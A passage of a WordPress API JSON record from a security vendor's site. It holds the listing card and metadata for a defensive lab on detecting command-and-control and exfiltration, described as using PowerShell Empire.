no-longer maintained by its original creators, it remains a popular choice for some threat actors.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[310,368,344],"labs_content_type":[313],"class_list":["post-10546","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-data-protection","category-network-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Data Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this lab we&#039;re going to be using PowerShell Empire, a framework that was first introduced in 2015. While no-longer maintained by its original creators, it remains a popular choice for some threat actors.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item\/10546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/media?parent=10546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/categories?post=10546"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/de\/wp-json\/wp\/v2\/labs_content_type?post=10546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}